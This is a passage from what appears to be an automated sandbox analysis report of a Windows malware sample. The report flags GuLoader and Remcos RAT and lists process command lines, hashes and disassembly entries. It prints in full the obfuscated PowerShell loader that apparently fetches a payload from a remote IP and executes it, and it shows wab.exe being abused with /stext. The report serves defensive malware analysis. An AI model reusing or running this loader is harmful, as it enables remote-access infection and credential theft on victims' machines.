emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;"
                  Imagebase:0x7ff6e3d50000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:01:48:52
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:01:48:54
                  Start date:02/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                  Imagebase:0x7ff744e60000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:01:49:01
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' .iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;"
                  Imagebase:0xe0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2523348220.0000000008E50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2523450659.00000000098C6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:01:49:02
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
                  Imagebase:0x1c0000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:01:49:23
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3365707907.0000000003B66000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:12
                  Start time:01:49:34
                  Start date:02/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:14
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:15
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:16
                  Start time:01:49:41
                  Start date:02/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
                  Imagebase:0x780000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FFD346FB0F6 Relevance: .5, Instructions: 471COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba840c255ba0c8fce4f7e8dd89fb91003851ce6e8c2daa96e319700fd9a97d72
                    • Instruction ID: 648cb342070fa196d2844cd4f5dbf25078741cfe8ef81c700805149f4f277ea5
                    • Opcode Fuzzy Hash: ba840c255ba0c8fce4f7e8dd89fb91003851ce6e8c2daa96e319700fd9a97d72
                    • Instruction Fuzzy Hash: A5F1A431A08A8D8FEBA8DF28C8957F937D1FF55310F04426EE84DC7295CB78A9458B81
                    Function 00007FFD346FBEA2 Relevance: .5, Instructions: 456COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a8462f098a61b61c6db33ea6cf0ccbf71bc3372cc5c88cb5283dc26731834b37
                    • Instruction ID: 212e9cbbd91b4042eabfb3d016fc08b9bca84af203506c99d130674a174b093e
                    • Opcode Fuzzy Hash: a8462f098a61b61c6db33ea6cf0ccbf71bc3372cc5c88cb5283dc26731834b37
                    • Instruction Fuzzy Hash: 9EE1C631A08A4D8FEBA8DF28C8657E977D1FF55310F14826EE84DC7291CF78A9458B81
                    Function 00007FFD346F4A0A Relevance: .4, Instructions: 446COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dda974cbc93363580df0f0ce242e5e4eb3e0cc5792a20e2ffc3ade99f23f1040
                    • Instruction ID: bb1f37f5787bfc195b881bca058797c9f70a576d557d406194769b086646ad1f
                    • Opcode Fuzzy Hash: dda974cbc93363580df0f0ce242e5e4eb3e0cc5792a20e2ffc3ade99f23f1040
                    • Instruction Fuzzy Hash: 11E1C332B0CA5E8FDB58DF5CC4A5AED77E1FFA9310F144176D549D7286CE28A8828780
                    Function 00007FFD347C6614 Relevance: .5, Instructions: 465COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663699467.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd347c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eded3ff43a1e598327f083db29bd65fcf1d32490682042d1b61ff85479c2c80c
                    • Instruction ID: 83f3ed90adc71504c180c8ca8e59b62740457cdb7ca4128842045994d35161fb
                    • Opcode Fuzzy Hash: eded3ff43a1e598327f083db29bd65fcf1d32490682042d1b61ff85479c2c80c
                    • Instruction Fuzzy Hash: C9E1E6B2B0DA8A9FEBA5DB1849F52A47BD1EF5A210B1801BAD55DC71E3CA1CFC05C341
                    Function 00007FFD347C7750 Relevance: .3, Instructions: 331COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663699467.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd347c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96454c3423d81a8cb7b109fa918396ad14edfd9b8a8644757f727832d2f60854
                    • Instruction ID: b0a78bacd1efae9f3119fecff702293a6c3b46daa42c9b8961f7cffad326daed
                    • Opcode Fuzzy Hash: 96454c3423d81a8cb7b109fa918396ad14edfd9b8a8644757f727832d2f60854
                    • Instruction Fuzzy Hash: D1A126A2B0DA8B9FEBA5DA2C44A55F477D1EF5A320B0801BAD54DC7193DD1CBC04C381
                    Function 00007FFD347C67A7 Relevance: .2, Instructions: 156COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663699467.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd347c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 369fde499fac6d04016d9805c4ccf7ec96d4468011800fbdeb6750eeaa0fe065
                    • Instruction ID: ae23767a3e1f9bc62ad51c785536350954a62667d6c0710768ef73e298232823
                    • Opcode Fuzzy Hash: 369fde499fac6d04016d9805c4ccf7ec96d4468011800fbdeb6750eeaa0fe065
                    • Instruction Fuzzy Hash: E651E1A2F0EA8AAFE7A5AB1849F11B877D1EF96210B5804BAD15CC71E3CD1CFC449341
                    Function 00007FFD347C7822 Relevance: .1, Instructions: 112COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663699467.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd347c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ddb083309c08e566a55e52b55f52a1a35a9877dce25eab6af4cc7c934ab83582
                    • Instruction ID: ec4a2534bcc35392fa50a16c248105581a83e17b5481257b79f534ddd78878bb
                    • Opcode Fuzzy Hash: ddb083309c08e566a55e52b55f52a1a35a9877dce25eab6af4cc7c934ab83582
                    • Instruction Fuzzy Hash: 6731F2D3F1EA876BF7A5962819B21F876C1AF57260B5805BAD25DC71D3DD0CBC00E281
                    Function 00007FFD346F3535 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                    • Instruction ID: 28ad6ca44869e0c5f6d8a2645ff2cda5415bc73be93e09bd1b1c1c5b10ba5c17
                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                    • Instruction Fuzzy Hash: DF01677121CB0C4FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3651DA36E891CB45

                    Non-executed Functions

                    Function 00007FFD346F16C9 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ,P_^$-P_^
                    • API String ID: 0-2410056697
                    • Opcode ID: 8d55f26152086696685776d13ce7d39ab8468b2de93ff9271aee1c717e891fd7
                    • Instruction ID: 774dc58c2496f77ac337dd66ac822c5f2a64b4abaa877ff732ddbd8b0ef43999
                    • Opcode Fuzzy Hash: 8d55f26152086696685776d13ce7d39ab8468b2de93ff9271aee1c717e891fd7
                    • Instruction Fuzzy Hash: D6618757E0EBD61EE7276A3878F60D67F94DF53268B0941B7C2D8CE093AD0C2C0A6211
                    Function 00007FFD347C088D Relevance: 1.0, Instructions: 1006COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663699467.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd347c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee689ece04698440307f26f00e06b301e54287a1e5a6e95281b4b638a3a0def5
                    • Instruction ID: f0d9397ebb01cfb9b97ab9c4f6d3496eded39161928585c9d0cc21662d43d273
                    • Opcode Fuzzy Hash: ee689ece04698440307f26f00e06b301e54287a1e5a6e95281b4b638a3a0def5
                    • Instruction Fuzzy Hash: 7D623972A0EBC59FE366976898A51A57FE0EF57210B0801FBD58DC7193D918BC06C3C1
                    Function 00007FFD346F44E0 Relevance: .4, Instructions: 366COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ebc9fab5d0a457b6b126379058b231b8b45efce405532f19da6b8f1e206659c
                    • Instruction ID: f92285bbc9bde51962ab539d0700fd61d6466035791364fdf0bd650f746a1edc
                    • Opcode Fuzzy Hash: 9ebc9fab5d0a457b6b126379058b231b8b45efce405532f19da6b8f1e206659c
                    • Instruction Fuzzy Hash: 67A1E82B70CA960FD715B66DE4A11EA3B94DFD333570801B7D2C8DB493DE19684B83A1
                    Function 00007FFD346F7AFA Relevance: .2, Instructions: 205COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffd346f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6daa2b61acf97ef90b46b874c0d74d93971af7dd5ed2d63456656601a20dba40
                    • Instruction ID: d8a7d04c8403e52be66c36e454d410ee8ece5e45622245d6f4e847a5072af181
                    • Opcode Fuzzy Hash: 6daa2b61acf97ef90b46b874c0d74d93971af7dd5ed2d63456656601a20dba40
                    • Instruction Fuzzy Hash: F251A75BB1DAE21EE212592D68B21DA3B94DF9316670904B7C3C9CB0D3ED0D584B62B2
                    Function 00007FFD346F6BF3 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.2663015115.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                    Joe Sandbox IDA Plugin
